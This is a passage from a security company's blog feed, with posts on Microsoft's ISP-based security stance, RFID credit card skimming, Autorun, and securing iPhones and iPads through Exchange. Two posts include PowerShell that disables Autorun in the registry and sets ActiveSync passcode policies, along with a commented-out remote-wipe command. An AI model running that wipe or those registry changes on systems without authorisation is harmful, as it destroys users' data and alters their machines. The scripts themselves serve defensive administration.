<p style="padding-left: 30px;"><em>Burke</em>: I&#8217;ve got 80 million high-speed customers. My customer support team tells me I&#8217;ll lose 5m of them within the first year of running this program. That&#8217;s 7 billion dollars of lost revenue in the first year.</p>
<p style="padding-left: 30px;">(pause)</p>
<p style="padding-left: 30px;"><em>Burke</em>: Are you trying to get <em>me</em> to throw a chair at <em>you</em>?</p>
<p style="padding-left: 30px;">(pause)</p>
<p style="padding-left: 30px;"><em>Burke</em>: Excuse me Steve, but you&#8217;ll understand if I pass. I&#8217;ve got to run anyway. It&#8217;s time for me to start working on my 2011 Christmas cards.</p>
<p>That conversation never happened, and the numbers I presented are fictitious. But you can understand why putting the onus on ISPs to &#8220;keep their pipes clean&#8221; isn&#8217;t good for business. That Microsoft realizes this now is merely an admission of reality, and most welcome.</p>
<p>But while Microsoft&#8217;s new position reflects a more realistic appreciation of the limits of securing customer computers, Charney doesn&#8217;t push his thinking as far as he could. For example, consider his analogy comparing infected PCs to infected people. Both are health risks, and in both cases it behooves authorities to be aware of infections as early as possible. To the extent you can compare people to PCs, it also makes sense to educate customers about basic practices they can adopt to reduce the risk of infection (although I suspect Symantec might object to the implied comparison of installing their software to hand-washing).</p>
<p>That said, computers aren&#8217;t like people at all. Computing can be improved in ways that the most audacious recombinant DNA theorist can only dream of, because unlike humans, machines&#8217; &#8220;DNA&#8221; &#8212; the operating systems and software that they are made of &#8212; can be replaced wholesale. From the security perspective, operating systems like SELinux, Qubes OS, BlackBerry OS, Apple&#8217;s iOS, Google&#8217;s Android or even Microsoft&#8217;s own Singularity or Windows Phone 7 are fundamentally superior to Windows, because they have built-in protections like code signing, verified roots of trust &#8212; often burned into hardware &#8212; and mandatory access control. Replacing Windows PCs with trusted Post-PC OSes such as Singularity or iOS isn&#8217;t merely a minor improvement like washing your hands. It&#8217;s more like replacing humans with a carbon-based life-form that&#8217;s immune to influenza.</p>
<p>Now, these other Post-PC OSes and their associated App Stores have other problems that I will be writing about in future posts, such as chatty, privacy-invading apps. But infections that compromise machine integrity aren&#8217;t one of their most pressing problems. And yes, I know I&#8217;m going to catch a lot of flak from the app security absolutists for saying this (&#8220;NOTHING is 100% secure&#8230;&#8221;). Please. Captain Obvious already paid me a visit today. Given enough time and money, anything is breakable. But acting as if mandatory code signing, sandboxing and hardware-based trust anchors don&#8217;t decrease risk significantly is tantamount to dismissing 30 years of research by people much smarter than you and me. And that, in turn, means that we are ignoring lessons about how software should be built. In other words: we should not let loose talk about &#8220;ecosystems&#8221; distract from the critical need to re-examine the core software we run on the systems we use in our daily work.</p>
<p>Charney gets close &#8212; so very close &#8212; to this key point. When he calls for public health certificates that rely on hardware roots-of-trust to vouch for the integrity of devices, he should, instead, ask himself why they are needed in the first place. When he admits that ISPs can&#8217;t filter out infected PCs because of the expense, he should be asking whether he ought to, instead, design an operating system that fundamentally resists infection.</p>
<p>And finally, when he suggests that customers should share responsibility for educating themselves about keeping their PCs clean, he should ask himself why they should care, and whether the hassle of &#8220;education&#8221; and &#8220;taking responsibility&#8221; is worth it from the customer&#8217;s standpoint.</p>
<p>Now <em>that&#8217;s</em> a visionary speech I wish he&#8217;d made.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/what-scott-charney-missed-in-his-rsa-speech/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>&#8220;Worried about RFID security? Here&#8217;s the solution. (Hint: you need a hammer and screwdriver)&#8221;</title>
		<link>http://perimeterusa.com/blog/worried-about-rfid-security-heres-the-solution-hint-you-need-a-hammer-and-screwdriver/</link>
		<comments>http://perimeterusa.com/blog/worried-about-rfid-security-heres-the-solution-hint-you-need-a-hammer-and-screwdriver/#comments</comments>
		<pubDate>Mon, 14 Feb 2011 15:13:46 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[Payment Card Industry compliance]]></category>
		<category><![CDATA[Skimming]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1129</guid>
		<description><![CDATA[Over the last few weeks it seems as though I can’t turn on a TV or pick up a newspaper without reading about the security issues related to Radio Frequency Identification or RFID technology in credit cards.  This seems to be the latest hot topic and I have seen feature stories on both my local and national news channels.  The reality is that this topic is not so new.  If you perform a Google search on “RFID security in Credit Cards” you will see that this security concern stretches all the way back to the early 2000’s.  Hacker’s and security experts have been using RFID reader technology in their hacking arsenal for some time now.  In fact, a simple search of eBay for RFID readers will bring up devices for under a hundred bucks that can skim data from a person walking by.  Even more frightening is that smartphones are now coming equipped with the ability to read RFID signals.  ]]></description>
			<content:encoded><![CDATA[<p><em>by Tom Neclerio, Chief Security Officer</em></p>
<p>Over the last few weeks it seems as though I can’t turn on a TV or pick up a newspaper without reading about the security issues related to Radio Frequency Identification, or RFID, technology in credit cards.  This seems to be the latest hot topic and I have seen feature stories on both my local and national news channels.  The reality is that this topic is not so new.  If you perform a Google search on “RFID security in Credit Cards” you will see that this security concern stretches all the way back to the early 2000s.  Hackers and security experts have been using RFID reader technology in their hacking arsenal for some time now.  In fact, a simple search of eBay for RFID readers will bring up devices for under a hundred bucks that can skim data from a person walking by.  Even more frightening is that smartphones are now coming equipped with the ability to read RFID signals.  Read about RFID coming to the iPhone: <a href="http://www.readwriteweb.com/archives/iphone_as_rfid_tag_reader.php">http://www.readwriteweb.com/archives/iphone_as_rfid_tag_reader.php</a></p>
<p>So why is it such a hot new topic in the last few weeks? Well, the simple fact is that while the skimming attack is not new, the adoption of RFID technology has taken off in the last year.  In the past month I personally was issued two new credit cards (replacing my old expired cards) and if I had not been specifically looking for it, I would never have realized that most credit card companies are now issuing new cards with the RFID technology enabled by default.  I challenge you to look into your wallet or purse, locate your newest card and flip it over.  Chances are that you will see that familiar wireless symbol that indicates RFID technology in the card.  Furthermore, if you hold that same card up to a bright light you can probably make out the chip that is embedded in the card.</p>
<p>Mystery solved&#8230;with more and more cards enabled with this technology, this old skimming attack resurfaced into the limelight and television stations all over the world are picking up the story.  So much so, in fact, that sales of aluminum credit card sleeves and insulated wallets (which shield the card so it cannot be read) have shot through the roof.</p>
<p>However, let’s dig a little deeper into the real risks associated with this technology in credit cards before we all run around in a panic.  I want to first state that I am a security guy, so I don’t want to lighten the concern but rather educate you on the real risk.  First let’s take the RFID readers that you can buy from eBay or enable in your smartphone and analyze what these devices can do.  Typically the read range of these low-end devices is fairly short, meaning that for a skimming attack to work, a person walking by you with one of these devices would have to bring their skimmer within a few centimeters of your wallet.  Think about it: when you walk up to a gas pump to pay with a speed pass, you have to remove the card from your wallet and hold it a few inches from the reader for it to register.</p>
<p>Secondly, if you examine the actual data that can be skimmed with these readers, you will notice that the reader essentially gathers the same information that is publicly displayed on the front of the card, such as your full name, the credit card number and the expiration date.  So basically this skimming attack gathers the same information that I could glean from a simple shoulder-surfing attack. The key missing element is the three-digit code printed on the back of most cards.  Since this is the case, the card issuers are even making the case that the new RFID technology provides greater privacy than traditional card payments, since the card never leaves your hands and the transmitted data contains less sensitive data than what is printed on the card.  You should not be able to make an Internet or phone purchase with the skimmed data, since the merchant should ask for the three-digit code on the back, or zip code verification, to complete the purchase.  Nor should you be able to clone the skimmed data onto a phony magnetic stripe card: the verification value the chip transmits is dynamic (generated for each transaction) rather than the static value encoded on the stripe, and the key that generates it is held securely in the chip on the original card.</p>
<p>You can link to the cardholder statements here:</p>
<p>Mastercard &#8211; <a href="http://www.mastercard.us/paypass.html#/home/">http://www.mastercard.us/paypass.html#/home/</a></p>
<p>Visa – <a href="http://usa.visa.com/personal/cards/paywave/index.html">http://usa.visa.com/personal/cards/paywave/index.html</a></p>
<p>American Express- <a href="https://www295.americanexpress.com/cards/loyalty.do?page=expresspay">https://www295.americanexpress.com/cards/loyalty.do?page=expresspay</a></p>
<p>The real scary fact that I gathered from these news stories is that since 2006 all new passports issued contain RFID chips and simple scans of these passports can reveal all of your passport data.  Think about the possible risks associated with this and how quickly your data can circle the world into the hands of malicious counterfeiters.  A wise person should spend their money on a protective metal-lined passport jacket instead of a credit card sleeve.</p>
<p>In summary, if all of this doesn’t make you feel a little better, then maybe the fact that all of the major credit card companies provide zero liability for fraudulent charges if your data is stolen will.  I personally have more comfort in the option that a simple hammer and screwdriver provide.  Just a simple tap from a hammer on a screwdriver placed on top of the embedded chip inside the card will render it useless.  I am sure this method is not endorsed by the card issuers, but it is the path I elected to take. Google it!</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/worried-about-rfid-security-heres-the-solution-hint-you-need-a-hammer-and-screwdriver/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Four Posts Worth Your Time, From the CTO&#8217;s Reading List</title>
		<link>http://perimeterusa.com/blog/four-posts-worth-your-time-from-the-ctos-reading-list/</link>
		<comments>http://perimeterusa.com/blog/four-posts-worth-your-time-from-the-ctos-reading-list/#comments</comments>
		<pubDate>Wed, 09 Feb 2011 19:20:41 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Apple iPad]]></category>
		<category><![CDATA[Banking Information Security]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[mobile security]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1125</guid>
		<description><![CDATA[Greetings! Every morning, I do a quick scan of the articles in my Google Reader queue. I have 'Reader configured to pull about 100 different RSS feeds on different topics ranging from security to high-tech news, plus topics on various "professional hobbies." I usually pick out a few articles to actually read. In what I hope will will become a regular feature here at Perimeter Blog Central, here are the four that caught my attention today: (1) Malware: Microsoft Disables Autorun for USB; (2) GQM+Strategies For Defining Security Metrics; (3) Veracode Announces Mobile App Security Scanning Service; and (4) Smartphones More Popular Than PCs.]]></description>
			<content:encoded><![CDATA[<p><em>By Andrew Jaquith, Perimeter CTO</em></p>
<p>Greetings! Every morning, I do a quick scan of the articles in my Google Reader queue. I have &#8216;Reader configured to pull about 100 different RSS feeds on different topics ranging from security to high-tech news, plus a variety of &#8220;professional hobbies&#8221; such as application development. I usually pick out a few articles to actually read. In what I hope will become a regular feature here at Perimeter Blog Central, here are four that caught my attention today:</p>
<p><strong>1. Malware: Microsoft Disables Autorun for USB</strong></p>
<p>In an innocuously-named post called &#8220;<a href="http://blogs.technet.com/b/msrc/archive/2011/02/04/deeper-insight-into-the-security-advisory-967940-update.aspx">Deeper insight into the Security Advisory 967940 update</a>,&#8221; my friend and metrics crony Adam Shostack describes why Microsoft is <a href="http://www.microsoft.com/technet/security/advisory/967940.mspx">disabling the default Autorun feature</a> for USB media in Windows XP, Windows Server 2003 and 2008, and Windows Vista. As the <a href="http://blogs.technet.com/b/mmpc/archive/2011/02/08/breaking-up-the-romance-between-malware-and-autorun.aspx">accompanying MSRC post describes</a>, it means that customers will run a reduced risk of being infected by malware when they insert USB sticks of unknown origin into their computers. I am glad to see Microsoft taking this step to protect customers, but to be fair, USB Autorun/Autoplay was one of the dopiest and riskiest features Microsoft ever introduced. It had FAIL written all over it. Good to see them uninstall it.</p>
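<p>The update only changes the default for USB media; administrators who want Autorun off for every drive type, and who want to confirm that it actually is, have long been able to do so through the <code>NoDriveTypeAutoRun</code> policy value. The following is an added example (my own, not Microsoft&#8217;s update or anything from Adam&#8217;s post) that reads the value, reports whether the removable-media bit is set, and enforces the all-drive-types setting when it isn&#8217;t. It assumes an elevated Windows PowerShell prompt; the bit layout of the value (one bit per drive type, 0x04 for removable media, 0x20 for CD/DVD, 0xFF for everything) is Microsoft&#8217;s documented one.</p>

```powershell
# Added example, not from the post or from Microsoft's update: check whether Autorun is
# switched off for all drive types and, if not, switch it off via NoDriveTypeAutoRun.
# Run from an elevated PowerShell prompt; the change applies at the next logon.

$policyKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$disableAll = 0xFF      # one bit per drive type; all bits set = Autorun off everywhere
$removable  = 0x04      # DRIVE_REMOVABLE bit: USB sticks and memory cards
$cdrom      = 0x20      # DRIVE_CDROM bit: the one media type the update leaves enabled

function Get-AutorunPolicy {
    # Returns the NoDriveTypeAutoRun value, or $null when it is absent. Absent means Windows
    # uses its built-in default, which does NOT set the removable-media bit.
    $item = Get-ItemProperty -Path $policyKey -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.NoDriveTypeAutoRun
}

function Test-AutorunDisabled {
    param([int]$DriveTypeBits = $disableAll)
    # True only if every requested drive-type bit is set in the policy value.
    $value = Get-AutorunPolicy
    if ($null -eq $value) { return $false }
    return (($value -band $DriveTypeBits) -eq $DriveTypeBits)
}

function Disable-Autorun {
    # Create the policy key if needed, then write 0xFF as a REG_DWORD (overwriting any old value).
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    New-ItemProperty -Path $policyKey -Name NoDriveTypeAutoRun -PropertyType DWord `
                     -Value $disableAll -Force | Out-Null
}

$current = Get-AutorunPolicy
if ($null -eq $current) { $shown = '(absent)' } else { $shown = '0x{0:X2}' -f $current }

if (Test-AutorunDisabled) {
    Write-Output ("NoDriveTypeAutoRun = {0}: Autorun already off for all drive types." -f $shown)
} else {
    $usb = if (Test-AutorunDisabled $removable) { 'off' } else { 'ON' }
    $cd  = if (Test-AutorunDisabled $cdrom)     { 'off' } else { 'ON' }
    Write-Output ("NoDriveTypeAutoRun = {0}: USB autorun {1}, CD/DVD autorun {2}." -f $shown, $usb, $cd)
    Disable-Autorun
    Write-Output ("Set NoDriveTypeAutoRun = 0x{0:X2}; log off and back on for it to take effect." -f (Get-AutorunPolicy))
}
```

<p>Two caveats. The same value can also live under <code>HKCU</code>, where it applies per user; the <code>HKLM</code> policy wins when both are present, which is why the example writes there. And on Windows XP and Server 2003, the value is honored reliably only once the Autorun update that Adam&#8217;s post describes is installed, so checking the registry alone is not the same as checking that the machine is patched.</p>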
<p><strong>2. Metrics: GQM+Strategies For Defining Security Metrics</strong></p>
<p>In his post on security metrics, <a href="http://secureitexpert.com/metrics-measures/metrics-gqmstrategies-for-defining-security-metrics/">Brad Bemis describes the Goal-Question-Metrics+Strategies (GQM+Strategies) method</a> for constructing metrics. It&#8217;s a good post, and describes a simple methodology that should be useful for customers who want to know how to think about the process. An important part of the post (and the method) is the focus on using (1) business objectives to drive the goals, which (2) prompt the questions and (3) lead to the creation of metrics. However, Brad&#8217;s &#8220;business objectives&#8221; discussion is a bit abstract. Fortunately, there are lots of very structured ways that corporations use to frame their objectives. I am a big fan of the <a href="http://www.amazon.com/Balanced-Scorecard-Step---Step-Performance/dp/0471780499">Balanced Scorecard</a>, which advocates measuring organizational performance according to the Financial, Customer, Internal Operations, and Learning &amp; Growth perspectives. I describe the &#8220;Balanced Security Scorecard&#8221; in my book, <a href="http://www.amazon.com/Security-Metrics-Replacing-Uncertainty-Doubt/dp/0321349989">Security Metrics: Replacing Fear, Uncertainty and Doubt</a>. (In better booksellers everywhere &#8212; and did I mention? &#8212; it makes a great gift.)</p>
<p><strong>3. Mobile: Veracode Announces Mobile App Security Scanning Service</strong></p>
<p>Today, my friends at Veracode announced a new service for <a href="http://threatpost.com/en_us/blogs/veracode-announces-mobile-app-verification-service-020911">scanning mobile applications for security flaws</a>. Veracode already scans apps for Windows Mobile (meh) and BlackBerry (ok, sure). Now, it is <a href="http://www.veracode.com/content/view/1391/38">expanding to cover Android (in Q1) and iOS apps (in Q2)</a>. Targeting the hottest two smartphone platforms is smart, and I applaud them for their leadership in this area. Full disclosure: I used to work with many of the principals of Veracode at @stake. I count Chris Wysopal (Veracode&#8217;s CTO, formerly the artist known as Weld Pond), Christian Rioux (Chief Scientist, fka Dildog) and Chris Eng (Senior Director) as friends, and I wish them all the best with this exciting new service.</p>
<p><strong>4. Mobile: Smartphones More Popular Than PCs</strong></p>
<p>Today&#8217;s <a href="http://www.ft.com/cms/s/2/d96e3bd8-33ca-11e0-b1ed-00144feabdc0.html#ixzz1DT8u3xBL">Financial Times reports that according to IDC, vendors shipped 101 million smartphones in the fourth quarter of 2010</a>. Vendors shipped just 92 million PCs. What it means: Post-PC devices are now more popular than the venerable PCs they are running next to (or in some cases, replacing). Of course, <a href="http://blogs.forrester.com/andrew_jaquith/10-08-02-post_pc_devices_what_your_definition_0">my former employer Forrester Research predicted that this would happen</a> nearly nine months ago, as I pointed out in a blog post from August of last year. Note that IDC&#8217;s numbers do not count the iPad in either category. If you count them in the &#8220;smartphone&#8221; bucket (as I do), the total is closer to 108 million Post-PC devices. What it means for customers: your security posture is going to change faster than you might think. As I <a href="http://perimeterusa.com/blog/what-apples-blowout-quarter-means-for-security/">pointed out in my previous post</a>, securing the mobile devices on your network cannot be an afterthought &#8212; it needs to be your front-and-center priority for 2011. You should focus on applying sensible controls to protect your data.</p>
<p>That&#8217;s it for today. I hope you are enjoying your week. See you at RSA next week!</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/four-posts-worth-your-time-from-the-ctos-reading-list/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>What Apple&#8217;s Blowout Quarter Means for Security</title>
		<link>http://perimeterusa.com/blog/what-apples-blowout-quarter-means-for-security/</link>
		<comments>http://perimeterusa.com/blog/what-apples-blowout-quarter-means-for-security/#comments</comments>
		<pubDate>Fri, 21 Jan 2011 23:22:26 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Apple iPad]]></category>
		<category><![CDATA[Banking Information Security]]></category>
		<category><![CDATA[IT Security]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1110</guid>
		<description><![CDATA[Author: Andrew Jaquith, CTO On the heels of the news that Apple CEO Steve Jobs was taking a medical leave of absence, the company announced its earnings after the close of the bell Tuesday. And even though Apple always sandbags its estimates, and even though it seems like we are used to seeing &#8220;Apple blows [...]]]></description>
			<content:encoded><![CDATA[<p><em>Author: Andrew Jaquith, CTO</em></p>
<p>On the heels of the news that Apple CEO Steve Jobs was taking a medical leave of absence, the company <a href="http://www.apple.com/pr/library/2011/01/18results.html">announced its earnings</a> after the close of the bell Tuesday. And even though Apple always sandbags its estimates, and even though it seems like we are used to seeing &#8220;Apple blows out its numbers&#8221; headlines every quarter, the announcement really <em>was</em> a blowout. The company announced record revenues, record profits ($6 billion), record shipments of Macs (4.1 million), record shipments of iPhones (16 million) and a gangbusters quarter for iPads (7.3 million). That might all seem abstract until you reflect on what this says about the changing mix of computing devices used by companies and by individuals:</p>
<ul>
<li><strong>The iPad is replacing laptops for some customers</strong>. With shipments of over 7m in the last quarter, iPad sales are now a statistically relevant 7% of worldwide PC sales. Combine that with the observation that netbook sales are down by 30% year over year. The conclusion: the iPad is becoming not just an <em>accessory</em> device, but a <em>replacement</em> device for a lot of mobile computing tasks. Our CEO and Chairman of the Board both carry an iPad; in the Chairman&#8217;s case, it has replaced his laptop entirely. Apple&#8217;s quarter means this won&#8217;t be an unusual phenomenon for long.</li>
<li><strong>iOS is emerging as a major enterprise platform to be secured</strong>. Since the introduction of the iPhone, Apple has sold <a href="http://www.appleinsider.com/articles/11/01/18/apple_has_sold_160m_ios_devices_average_iphone_price_grows_to_625.html">160 million iPhones, iPads or iPod Touch devices</a>. Put another way, Apple sold 160 million devices that are capable of accessing corporate e-mail. If you assume that 25% of these devices are used for work purposes, that means 40 million iOS devices that need to be properly secured. That is probably a conservative number: Apple told the Street that <a href="http://www.appleinsider.com/articles/11/01/18/notes_of_interest_from_apples_q1_2011_conference_call.html">88% of the Fortune 100 are deploying the iPhone in some way</a>, and that 80% are piloting or supporting the iPad. The canonical example of this might be JP Morgan Chase, which announced in December 2010 that <a href="http://www.bloomberg.com/news/2010-11-30/jpmorgan-gives-its-investment-bankers-ipads-in-challenge-to-rim-blackberry.html">every employee in its investment banking division will receive an iPad</a>.</li>
</ul>
<p>There are a lot of pundits and security vendors that see the emergence of Apple as a non-traditional enterprise supplier as a sign of impending doom. McAfee believes that we&#8217;ll <a href="http://www.mcafee.com/us/resources/reports/rp-threat-predictions-2011.pdf">finally see an influx of Mac and iOS malware</a> (despite the dearth of it in the past). Cisco <a href="http://www.cisco.com/en/US/prod/collateral/vpndevc/security_annual_report_2010.pdf">says something similar</a>. And so does <a href="http://nakedsecurity.sophos.com/2011/01/07/will-mac-app-store-keep-malware-out/">Sophos</a> (although that&#8217;s a drum they have been <a href="http://www.crn.com/news/security/226500223/sophos-calls-out-apple-microsoft-on-security.htm">beating</a> so long I&#8217;m surprised their arms haven&#8217;t fallen off).</p>
<p>Our view here at Perimeter is that all this talk about Apple malware is just a bright-and-shiny argument not dissimilar to the bright-and-shiny qualities of Apple products themselves. It&#8217;s hot air meant to scare customers and promote vendor products and ahem, &#8220;demonstrate thought leadership.&#8221; That&#8217;s fine, but customers should not be misled. The security issues with Apple devices are far less dramatic, and far more prosaic, than whether a sly programmer can slip malware past the App Store screeners. As an analyst at Forrester, <a href="http://www.zdnet.com/blog/btl/forrester-apples-iphone-ipad-secure-enough-for-enterprises-but-rim-rules-security-roost/37467">I wrote extensively about why anti-malware software won&#8217;t be needed</a> on Apple iPhone and iPad devices, due to core security features in iOS like code signing, mandatory access control (&#8220;sandboxing&#8221;) and trusted boot processes. Moreover, despite all of the <a href="http://www.mobilemarketer.com/cms/news/research/6941.html">screeching</a> about potentially overly privileged applications that might or might not be beaming your contact list to Outer Mongolia, chatty apps aren&#8217;t a major issue either (at least not yet).</p>
<p>The real security issue that the increasingly omnipresent Apple devices force us to confront is much more basic. And it is related to what the devices are used for &#8212; getting email. Companies I speak with about mobile security issues want to make sure that their employees access e-mail and other company resources safely, and in accordance with standard security policies. That means:</p>
<ul>
<li>Automatically provisioning your e-mail accounts and global address books</li>
<li>Encrypting traffic to and from e-mail servers</li>
<li>Locking the device with a PIN or passcode, 6 digits at a minimum</li>
<li>Setting a policy so that devices automatically lock themselves after 15 or 30 minutes of inactivity, and automatically erase themselves after too many failed passcode attempts</li>
<li>Activating the &#8220;remote wipe&#8221; feature that allows administrators to brick a device if it has been lost or stolen</li>
</ul>
<p>In other words, the major security issue with Apple products is how to implement security controls, and not how to repel the wily hacker. The good news is that policy controls are not very hard or expensive to implement &#8212; just configure your Microsoft Exchange server or Lotus Notes Traveler server to enforce the relevant security policies via ActiveSync. PerimeterUSA customers, for example, can implement iOS security features as a standard feature of our <a href="http://perimeterusa.com/services/messaging/hosted-email/microsoft-exchange-hosting">hosted Exchange service</a>. Apple also provides the <a href="http://support.apple.com/kb/DL851">iPhone Configuration Utility</a>, which allows customers to generate configuration profiles that can be distributed over the air to iPhones and iPads.</p>
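<p>Here is what &#8220;configure your Exchange server to enforce the relevant policies via ActiveSync&#8221; looks like in practice, as an added example of the five controls listed above (my own illustration, not Perimeter&#8217;s hosted-service configuration or Apple&#8217;s code). It uses the Exchange 2010 Management Shell cmdlets; the policy name, the mailbox alias <code>jdoe</code> and the device identity are placeholders, and Exchange 2013 later renamed these cmdlets to the <code>*-MobileDeviceMailboxPolicy</code> family.</p>

```powershell
# Added example, not from the post: create an ActiveSync mailbox policy that enforces the
# five controls listed above, assign it to a mailbox, verify it, and show the remote wipe.
# Assumes the Exchange 2010 Management Shell; 'iOS-Baseline' and 'jdoe' are placeholders.

$policyName = 'iOS-Baseline'

$settings = @{
    Name                            = $policyName
    DevicePasswordEnabled           = $true       # a passcode is required at all
    AllowSimpleDevicePassword       = $false      # refuse 1111 / 1234 style codes
    MinDevicePasswordLength         = 6           # six digits at minimum
    MaxInactivityTimeDeviceLock     = '00:15:00'  # auto-lock after 15 minutes idle
    MaxDevicePasswordFailedAttempts = 10          # device erases itself after 10 wrong codes
    AllowNonProvisionableDevices    = $false      # block clients that cannot apply the policy
    RequireDeviceEncryption         = $true       # also blocks older iPhones without hardware encryption
}

# Create the policy, or update it in place if an earlier run already created it.
if (Get-ActiveSyncMailboxPolicy -Identity $policyName -ErrorAction SilentlyContinue) {
    $settings.Remove('Name')
    Set-ActiveSyncMailboxPolicy -Identity $policyName @settings
} else {
    New-ActiveSyncMailboxPolicy @settings | Out-Null
}

# Assign the policy to a mailbox. The device picks it up at its next sync and must
# acknowledge it before Exchange lets it keep synchronizing mail.
Set-CASMailbox -Identity 'jdoe' -ActiveSyncMailboxPolicy $policyName

# Verification: read the policy back and confirm the assignment.
Get-ActiveSyncMailboxPolicy -Identity $policyName |
    Format-List DevicePasswordEnabled, AllowSimpleDevicePassword, MinDevicePasswordLength,
                MaxInactivityTimeDeviceLock, MaxDevicePasswordFailedAttempts,
                AllowNonProvisionableDevices, RequireDeviceEncryption
Get-CASMailbox -Identity 'jdoe' | Format-List ActiveSyncEnabled, ActiveSyncMailboxPolicy

# Remote wipe of a lost or stolen device: list the devices partnered with the mailbox,
# then issue the wipe against the identity of the missing one (placeholder below).
Get-ActiveSyncDeviceStatistics -Mailbox 'jdoe' |
    Format-Table DeviceType, DeviceID, LastSuccessSync, Identity -AutoSize
# Clear-ActiveSyncDevice -Identity '<Identity value from the listing above>' -Confirm:$false
```

<p>Two notes on the choices. <code>AllowNonProvisionableDevices = $false</code> is the setting that gives the rest of the policy teeth: without it, a client that does not implement ActiveSync provisioning simply ignores the passcode and timeout requirements and keeps syncing. And the wipe command is left commented out on purpose, since it erases the device the moment it next connects; the listing step is there so you confirm the device identity before you run it.</p>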
<p>So to sum up: in the short term, what Apple&#8217;s blowout quarter means for security is three things:</p>
<ul>
<li>It means that you will soon see a lot more Apple devices on your corporate networks</li>
<li>It means you will need to configure these devices with sensible security policies, but that&#8230;</li>
<li>&#8230;most of the things you need to do are straightforward, and can be done inexpensively</li>
</ul>
<p>Over the longer term, the iPad in particular has interesting implications for security in addition to the e-mail, connectivity and configuration topics I&#8217;ve mentioned in this post. With the iPad, <em>it&#8217;s all about the apps</em>. I will write about that in a future post. In the meantime, good luck finding a fashionable case for your new device.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/what-apples-blowout-quarter-means-for-security/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>5 Data Security Predictions for 2011, Part 1 of 3: The Year of Living Dangerously</title>
		<link>http://perimeterusa.com/blog/5-data-security-predictions-for-2011-part-1-of-3-the-year-of-living-dangerously/</link>
		<comments>http://perimeterusa.com/blog/5-data-security-predictions-for-2011-part-1-of-3-the-year-of-living-dangerously/#comments</comments>
		<pubDate>Mon, 13 Dec 2010 21:06:23 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Apple iPad]]></category>
		<category><![CDATA[Banking Compliance]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[FINRA]]></category>
		<category><![CDATA[HITECH]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[PCI DSS compliance]]></category>
		<category><![CDATA[Web Content Filtering]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1074</guid>
		<description><![CDATA[Last week I hosted a webinar called “5 Data Security Predictions for 2011.” For those of you who couldn't make the webinar, you can click on this link to view the replay. But if you are allergic to multimedia, I thought I'd summarize the topics I covered in the webinar here. This post covers the first item on the agenda: looking back at 2010.]]></description>
			<content:encoded><![CDATA[<p><em>By Andrew Jaquith, CTO of Perimeter E-Security</em></p>
<p>Last week I hosted a webinar called “5 Data Security Predictions for 2011.” The webinar was my first of many for Perimeter. It was lots of fun. I received some excellent questions from the audience. And I was gratified to see that we had several hundred registered attendees, too!</p>
<p>For those of you who couldn&#8217;t make the webinar, you can <a title="Data Security Predictions for 2011" href="http://www.perimeterusa.com/knowledge-center/webinars/on-demand#162" target="_blank">click on this link to view the replay</a>. But if you are allergic to multimedia, I thought I&#8217;d summarize the topics I covered in the webinar here. Last week&#8217;s webinar had three goals:</p>
<ul>
<li>To take a look back at the key security trends from 2010</li>
<li>To summarize the three most interesting security events of the last year, and the lessons we learned from them</li>
<li>To predict five data security trends for 2011</li>
</ul>
<p>This post covers the first item on the agenda: looking back at 2010.</p>
<p><strong>2010: The Year of Living Dangerously</strong></p>
<p><img class="alignnone" style="margin-left: 15px; margin-right: 15px;" src="http://upload.wikimedia.org/wikipedia/en/0/0b/Year_of_living_dangerously.jpg" alt="The Year of Living Dangerously (c) MGM" width="266" height="400" /></p>
<p>With many apologies to the actor formerly known as Mel Gibson, 2010 extended and deepened four trends we&#8217;ve seen in previous years. These should seem familiar to you, but there are a few twists that make them worthy of comment. In 2010, we observed:</p>
<ul>
<li><strong>Multiplying threats</strong>. It should come as no surprise to astute security professionals that malware has continued to proliferate. As with previous years, the number of circulating malware samples increased, by some counts, by a factor of 10 over the previous year. McAfee, for example, <a href="http://www.h-online.com/security/news/item/McAfee-Malware-still-on-the-rise-1138340.html" target="_blank">estimates the number of samples has exceeded 50 million</a>. Other AV vendors have reported similar figures. The reason for the increases is simple: attackers are creating malware in smaller “batch sizes” (but with a larger number of batches) to evade detection by anti-virus engines. We are getting close to what I call “designer malware”: one signature, one victim. It&#8217;s not hard to understand why that strategy would work for the bad guys: if you can create unique malware for each victim, you can slide under the radar screen of the AV labs because the prevalence is nearly zero. The low-and-slow attack vector for modern malware is a difficult challenge for everyone in the industry. And it is clearly successful. From Perimeter&#8217;s perspective as an MSSP, we have been tracking nearly 25 botnets that we&#8217;ve observed in action inside our customers&#8217; networks. We expect to track more incursions in the future.</li>
